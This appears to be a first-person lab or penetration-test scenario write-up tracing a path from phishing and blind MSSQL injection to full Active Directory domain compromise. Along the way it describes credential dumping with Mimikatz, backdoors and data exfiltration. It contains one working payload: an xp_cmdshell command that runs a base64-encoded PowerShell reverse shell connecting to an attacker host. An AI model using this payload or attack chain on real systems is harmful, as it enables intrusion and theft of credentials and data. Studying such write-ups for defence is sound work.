S1P1

Scenario 1 - The Hidden Path to Domain Dominance

Scenario 1 - The Hidden Path to Domain Dominance

1. Initial Access:

I began with a standard phishing attack, which led to compromising a single host within the corporate network. The host was domain-joined, and after successfully obtaining standard user credentials, I started my enumeration. During this phase, I ran common tools like PowerView and BloodHound to explore the domain environment.

There wasn't much of immediate value, but I noticed a running SQL Server instance on one of the machines. This piqued my interest, as SQL Server is a common place for misconfigurations or vulnerabilities to exist, especially when services like SQL Server Authentication are improperly configured.

2. Discovering the MSSQL Injection Vulnerability:

I decided to investigate the application that interacted with the SQL Server. It was a web application that had a search feature, and after inspecting its behavior, I noticed it was vulnerable to SQL injection. This was a blind injection, and while it didn’t initially leak sensitive data directly, I could tell it was interacting with the backend database in a way that could be exploited.

I spent some time exploiting this injection vulnerability to extract information about the database and its users. During my testing, I found a Service Principal Name (SPN) associated with a service account used by the MSSQL server—MSSQLSvc/sqlserver.company.local. This was an important lead because it meant that this service account could potentially have high privileges and be involved in domain operations.

3. Exploiting SQL Server for RCE:

Next, I found that the SQL Server instance was running with elevated privileges. It allowed for xp_cmdshell, a built-in extended stored procedure, which can execute arbitrary OS commands from within SQL Server. With this, I was able to gain Remote Code Execution (RCE) on the server itself.

Using the SQL injection, I injected commands to execute the xp_cmdshell procedure and ran the following command to spawn a reverse shell:

EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==';

This reverse shell connected back to my attacker's machine, and I now had SYSTEM-level access to the server, with full control over the system running SQL Server.

4. Privilege Escalation to Domain Admin:

Now that I had RCE on the server, I explored the system further and found several credentials stored in memory and configuration files. Among these, I found credentials for a highly privileged service account used for SQL Server maintenance, which was part of the domain administrators group.

This account was configured with delegation rights, allowing it to impersonate higher-privileged users across the network. With this credential, I could access critical resources and escalate further.

5. Accessing the Domain Controller and Full Compromise:

Using the domain administrator credentials I obtained, I pivoted to the domain controller. I used tools like Mimikatz to dump the hashes and cleartext passwords for all domain accounts, including those of other administrators.

I then added my own account to the Domain Admins group, ensuring persistent access to the entire domain. With full control over the domain, I could access sensitive data across the network, perform lateral movements, and deploy persistence mechanisms.

6. Exfiltration and Final Control:

Now in full control of the domain, I exfiltrated sensitive data, including customer information and financial records. I also created additional backdoors to maintain access.

---

Key Takeaways:

• MSSQL Injection: A vulnerable SQL injection point in the web application allowed me to interact with the database and find the Service Principal Name (SPN) associated with SQL Server.

• Remote Code Execution (RCE): By exploiting the xp_cmdshell feature of SQL Server, I gained Remote Code Execution on the server, providing SYSTEM access.

• Privilege Escalation: The compromised service account had elevated privileges and delegation rights, allowing me to impersonate domain admins and escalate to full domain control.

• Domain Compromise: Once I gained domain admin access, I had unrestricted access to all systems and sensitive data within the organization.